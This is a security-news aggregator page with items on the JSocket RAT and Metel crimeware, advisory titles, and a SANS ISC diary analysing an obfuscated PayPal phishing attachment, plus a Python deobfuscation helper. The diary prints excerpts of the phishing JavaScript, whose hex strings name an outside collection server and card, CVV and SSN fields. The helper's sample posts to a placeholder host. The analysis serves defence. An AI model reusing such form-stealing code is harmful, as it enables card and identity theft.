Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

The JSocket website: open for business on the open Web (at least right now). (credit: Sean Gallagher)

A family of Java-based malware that has given attackers a backdoor into Windows, Linux, Mac OS X, and Android devices since 2013 has risen from the dead once again as a "commercial" backdoor-as-a-service. It was recently detected in an attack on a Singapore bank employee. Previously known as AlienSpy or Adwind, the malware was all but shut down in 2015 after the domains associated with its command and control network were suspended by GoDaddy. But according to Vitaly Kamluk, the director of Kaspersky Lab's Asia/Pacific research and analysis team, the malware has been modified, rebranded, and is open for service again to customers ranging from Nigerian scam operators to possible nation-state actors. Ars has confirmed that the service is offered openly through a website on the public Internet.

AlienSpy was found last spring on the Android phone of Alberto Nisman, the Argentinian prosecutor who died under suspicious circumstances just as he was apparently about to deliver a report implicating the Argentine government in the bombing of a Buenos Aires Jewish community center in 1994. Now resurrected under the names JSocket and jRat, according to a presentation by Kamluk at the Kaspersky Security Analyst Summit 2016 in Tenerife, the malware is available through an open website to subscribers at prices ranging from $30 for one month to $200 for an unlimited license. Kamluk believes the service's author is a native Spanish speaker, possibly based out of Mexico.

JSocket includes a number of typical "RAT" (remote access tool) capabilities, including video capture from webcams, audio capture from microphones, the ability to detect antivirus software on a system, a keylogger to record keystrokes, and a virtual private network key-stealing feature that could be used to gain access to any of the VPNs used by the victim. Kaspersky has tracked more than 150 attack campaigns against more than 60,000 targets with the latest iterations of the malware, with Nigerian e-mail-based scam operations (particularly those targeting banks) being the biggest adopters of the tool. The lion's share of the remaining subscribers to the malware appeared to come from the US, Canada, Russia, and Turkey.


 
Guest blog post by Willie May, Under Secretary of Commerce for Standards and Technology and NIST Director. Strong cybersecurity starts at the top. FRONT ROW (from left to right): Ike Leggett, Montgomery County Executive Maryland Lt ...
 


To appreciate how malware targeting banks and other financial institutions is adopting sophisticated techniques once reserved for state-sponsored spies using so-called advanced persistent threats, consider the recently discovered Metel crimeware package.

It contains more than 30 separate modules that can be tailored to the computer it's infecting. One of the most powerful components automatically rolls back ATM transactions shortly after they're made. As a result, people with payment cards from a compromised bank can withdraw nearly unlimited sums of money from ATMs belonging to another bank. Because the Metel module repeatedly resets card balances, the criminals never pass the threshold that would normally freeze the card. Last year, the rollback scheme caused an unnamed bank in Russia to lose millions of rubles in a single night.

Metel usually gains an initial foothold by exploiting vulnerabilities in browsers or through spear phishing e-mails that trick employees into executing malicious files. Members of the Metel hacking gang then use legitimate software, of the kind used by server administrators and security researchers, to compromise other PCs in an attempt to burrow further into the targeted network. They will often patiently work this way until they gain control over a system with access to money transactions, for example PCs used by call center operators or IT support.


 

Monday Morning Quarterbacking Super Bowl 50: Infosec Edition
Dark Reading
So, while on Sunday you may have been absorbed in the unstoppable Von Miller or the hapless Cam Newton, now that it's in the books you can take a few moments to let a few of these infosec football analogies percolate in your subconscious. You might ...

 


What to love about your IT security job
CSO Online
Security practices may not top the “what I love about my job” list for the everyday employee, but for those working in the InfoSec industry, it's a different story. Between the thrill of building systems to protect data and keeping up with an ever ...

 
WordPress WP User Frontend Plugin [Unrestricted File Upload]
 
WordPress WooCommerce - Store Toolkit Plugin [Privilege Escalation]
 
PressePortal NewsAktuell (DPA) - Multiple Vulnerabilities
 
Ebay Inc (Pages) - Client Side Cross Site Scripting Vulnerabilities
 
Alsovalue CMS 2016Q1 - SQL Injection Web Vulnerability
 
JavaScript Anywhere v3.0.4 iOS - Persistent Vulnerability
 
Local Microsoft Windows 7 / 8 / 10 Buffer Overflow via Third-Party USB-Driver (ser2co64.sys)
 
Getdpd BB #5 - Persistent Filename Vulnerability
 
Symphony CMS multiple vulnerabilities
 
Executable installers are vulnerable^WEVIL (case 25): WinRAR's installer and self-extractors allow arbitrary (remote) code execution and escalation of privilege
 
WordPress User Meta Manager Plugin [Information Disclosure]
 

I found an interesting phishing email. Nothing fancy or exotic about the content, just a classic email notification pretending to be sent by PayPal and asking the victim to urgently review and update his/her personal settings. The message was clever enough to not trigger anti-spam rules (SpamAssassin). The attached file is just a regular HTML file containing some obfuscated JavaScript code. This page was unknown to VT when I checked it. Here is a dump of the JavaScript code (some parts are cut in this post):

    function wp_plugin(r) {
        var e, n, i, t, a, d, o, f,
            h = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
            c = 0, C = 0, g = "", r += ...
        do t = h.indexOf(r.charAt(c++)), a = h.indexOf(r.charAt(c++)),
           d = h.indexOf(r.charAt(c++)), o = h.indexOf(r.charAt(c++)),
           f = t << 18 | a << 12 | d << 6 | o,
           e = f >> 16 & 255, n = f >> 8 & 255, i = 255 & f, ...
        while (c ...
        return g = x.join(""), g.replace(/\0+$/, "")
    }
    function GoogleAnalytics(r, o) { ... 256 ... 256 ... for (var t = ... f ... return t }
    var GA_PLUGIN = .....redacted.....
    var _0xbf60 = ["GA-ID18998", "\x77\x72\x69\x74\x65" ...

A first analysis shows that functions are named with common strings for websites (WordPress, Google Analytics). No suspicious string is present in the code that could trigger a security control. The variable GA_PLUGIN contains ~23KB of data (that have been removed in this post) that immediately looks to be BASE64 encoded. A copy of the original HTML file is available here if you

GA_PLUGIN is used by wp_plugin(), which is a BASE64 decoder function. Let's decode it manually and we obtain a binary file without any interesting patterns / strings in it. The binary content is passed to the GoogleAnalytics() function with a second parameter (the key). I tried a simple XOR but it failed.

The function being available in the code, I did not lose my time and just executed it in a sandbox to get the decoded data, which is the complete HTML page that is finally displayed in the browser via the last line (_0xbf60[1] = "write"). Here again, the decoded HTML page contains a second layer of obfuscation with more JavaScript code. When the victim clicks on "Submit Form", data are not posted directly to a remote server but the xsub() function is called. The arrays contain just strings in hexadecimal encoding, nothing fancy.

    var _0x22eb9a = "c113b797cd0456be0d1a9c2f35f7d78b.php"
    var _0x2da3 = ["\x6C\x65\x6E\x67\x74\x68", "\x63\x68\x61\x72\x41\x74",
        "\x68\x74\x74\x70\x3A\x2F\x2F\x74\x31\x2E\x73\x79\x73\x74\x65\x6D\x66\x69\x6C\x74\x65\x72\x73\x2E\x6E\x65\x74\x2F",
        "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x61\x79\x70\x61\x6C\x2E\x63\x6F\x6D\x2F",
        "\x72\x65\x70\x6C\x61\x63\x65", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x61\x63\x74\x69\x6F\x6E",
        "\x65\x6E\x76", "\x66\x6F\x72\x6D\x73", "\x6D\x65\x74\x68\x6F\x64", "\x70\x6F\x73\x74",
        "\x73\x75\x62\x6D\x69\x74" ...
    var _0x27ca82 = (function(_0xe689x2) {
        return function(_0xe689x3) {
            var _0xe689x4 = _0xe689x3[_0x2da3[0]], _0xe689x5 = 1, _0xe689x6 = 0, ...
            while (_0xe689x4) { ... _0xe689x6 += (_0xe689x5 ^= 1) ? _0xe689x2[_0xe689x7] : _0xe689x7 ...
            return _0xe689x6 ... _0xe689x6 % 10 === 0
        }
    function xsub() {
        if (!_0x11e97d()) { return false ...
        if (!_0xbbd7eb) { _0x98a278 += _0x22eb9a ...
        document[_0x2da3[8]][_0x2da3[7]][_0x2da3[11]]()
    }
    var _0x9939 = ["\x76\x61\x6C\x75\x65", "\x63\x63\x61\x72\x64\x6E\x75\x6D", "\x65\x6E\x76",
        "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x61\x79\x70\x61\x6C\x2E\x63\x6F\x6D\x2F",
        "\x72\x65\x70\x6C\x61\x63\x65", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x63\x61\x64\x64\x72",
        "\x63\x65\x78\x70\x6D", "\x63\x65\x78\x70\x79", "\x63\x63\x76\x76", "\x6E\x61\x6D\x65", "\x30\x30",
        "\x63\x73\x73\x6E", "\x6C\x65\x6E\x67\x74\x68", "\x2D", "\x69\x6E\x64\x65\x78\x4F\x66",
        "\x55\x6E\x69\x74\x65\x64\x20\x53\x74\x61\x74\x65\x73", "\x63\x63\x6F\x75\x6E\x74\x72\x79",
        "\x63\x7A\x69\x70" ...
    function _0x11e97d() {
        if (!ax) { return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 ...
        var _0x88a0x2 = document[_0x9939[2]][_0x9939[6]][_0x9939[0]],
            _0x88a0x3 = document[_0x9939[2]][_0x9939[7]][_0x9939[0]],
            _0x88a0x4 = document[_0x9939[2]][_0x9939[8]][_0x9939[0]], ...
        if (!document[_0x9939[2]][_0x9939[10]][_0x9939[0]] || !_0x88a0x2 || !_0x88a0x5 ||
            _0x9939[11] == _0x88a0x3 || _0x9939[11] == _0x88a0x4) {
            return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 ...
        -1 != _0x88a0x2[_0x9939[15]](_0x9939[14]) ...
        if (_0x9939[16] == document[_0x9939[2]][_0x9939[17]][_0x9939[0]]) {
            if (0 ... _0x88a0x3 ... _0x88a0x3 != _0x88a0x4) { return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 ...
            if (0 ... _0x88a0x2 ... 5 != _0x88a0x2) { return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 }
        return !0

The interesting line is the first one, which contains the PHP page where data are posted. If you browse the code, you see that it is appended to _0x2da3[2], i.e. "\x68\x74\x74\x70\x3A\x2F\x2F\x74\x31\x2E\x73\x79\x73\x74\x65\x6D\x66\x69\x6C\x74\x65\x72\x73\x2E\x6E\x65\x74\x2F". Another interesting function is _0x11e97d(), which performs multiple checks against the data submitted by the victim. Indeed, the attacker took the time to validate the data passed via the form.

If one of them does not match the requirements, nothing is sent to the malicious server and just a redirect occurs. Example: the credit card number and SSN are checked (via the function _0x27ca82()). To successfully submit my test data, I bypassed _0x11e97d() with a simple "return 1". In this phishing campaign, victims from the United States are targeted because a real SSN is mandatory. It also demonstrates that the attacker took extra care to validate the data to get only valid information sent to him. This is a nice example of multiple obfuscation levels: nothing is downloaded from the Internet, the user just has to execute the HTML file attached to the email.
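As an added example (not code from the diary or from the sample it analyzes), a small Python helper that automates the analysis step above for the second obfuscation layer: it decodes the hex-escaped `_0x...` string arrays, rewrites `name[index]` lookups into the literal strings so the form-submission logic becomes readable, and lists the URLs the victim's data would be posted to. The script embedded in `SAMPLE` and its placeholder URL `http://c2.example.invalid/` are constructed in the style of the real attachment, not taken from it.

```python
import re

# Constructed sample in the style of the second obfuscation layer
# (hex-escaped string array plus name[index] lookups). The URL is a
# placeholder, not the collection server of the real attachment.
SAMPLE = r'''var _0x22eb9a = "exfil.php"
var _0x2da3 = ["\x6C\x65\x6E\x67\x74\x68", "\x68\x74\x74\x70\x3A\x2F\x2F\x63\x32\x2E\x65\x78\x61\x6D\x70\x6C\x65\x2E\x69\x6E\x76\x61\x6C\x69\x64\x2F", "\x65\x6E\x76", "\x66\x6F\x72\x6D\x73", "\x73\x75\x62\x6D\x69\x74", "\x61\x63\x74\x69\x6F\x6E"]
function xsub() { document[_0x2da3[3]][_0x2da3[2]][_0x2da3[5]] = _0x2da3[1] + _0x22eb9a; document[_0x2da3[3]][_0x2da3[2]][_0x2da3[4]]() }'''

ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\]', re.S)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
ESC_RE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\(.)')
LOOKUP_RE = re.compile(r'(_0x[0-9a-fA-F]+)\[(\d+)\]')

def decode_js_string(body):
    """Resolve \\xHH, \\uHHHH and simple backslash escapes of a JS string literal."""
    def sub(m):
        if m.group(1) or m.group(2):
            return chr(int(m.group(1) or m.group(2), 16))
        return m.group(3)
    return ESC_RE.sub(sub, body)

def extract_string_arrays(script):
    """Map each `var _0xNNNN = [...]` declaration to its list of decoded strings."""
    return {name: [decode_js_string(s) for s in STRING_RE.findall(body)]
            for name, body in ARRAY_RE.findall(script)}

def resolve_lookups(script, arrays):
    """Rewrite name[index] lookups into the quoted literal they stand for."""
    def sub(m):
        items = arrays.get(m.group(1))
        idx = int(m.group(2))
        if items is None or idx >= len(items):
            return m.group(0)  # unknown array or out-of-range index: keep as-is
        return '"%s"' % items[idx].replace('"', '\\"')
    return LOOKUP_RE.sub(sub, script)

def collection_urls(arrays):
    """Decoded strings that look like URLs: where the victim's data would go."""
    return sorted(s for items in arrays.values() for s in items
                  if s.startswith(("http://", "https://")))

def deobfuscate(script):
    """Return (decoded arrays, readable script) for one obfuscated layer."""
    arrays = extract_string_arrays(script)
    return arrays, resolve_lookups(script, arrays)

if __name__ == "__main__":
    arrays, readable = deobfuscate(SAMPLE)
    print(readable)
    print("posts to:", collection_urls(arrays))
```

The same two functions can be run over the decoded first layer of a real attachment to recover the array of field names (value, ccardnum, cssn, ...) and the collection URL without executing any of the attacker's code.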

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

 
Multiple vulnerabilities in Open Real Estate v 1.15.1
 
[SECURITY] [DSA 3467-1] tiff security update
 
[SECURITY] [DSA 3468-1] polarssl security update
 
CFP: SIN 2016 - 9th International Conference on Security of Information and Networks
 
[security bulletin] HPSBHF03431 rev.2 - HPE Network Switches, local Bypass of Security Restrictions, Indirect Vulnerabilities
 
[security bulletin] HPSBGN03434 rev.1 - HP Continuous Delivery Automation using Java Deserialization, Remote Arbitrary Code Execution
 
[CVE-2016-0602, CVE-2016-0603] Executable installers are vulnerable^WEVIL (case 24): Oracle Java 6/7/8 SE and VirtualBox
 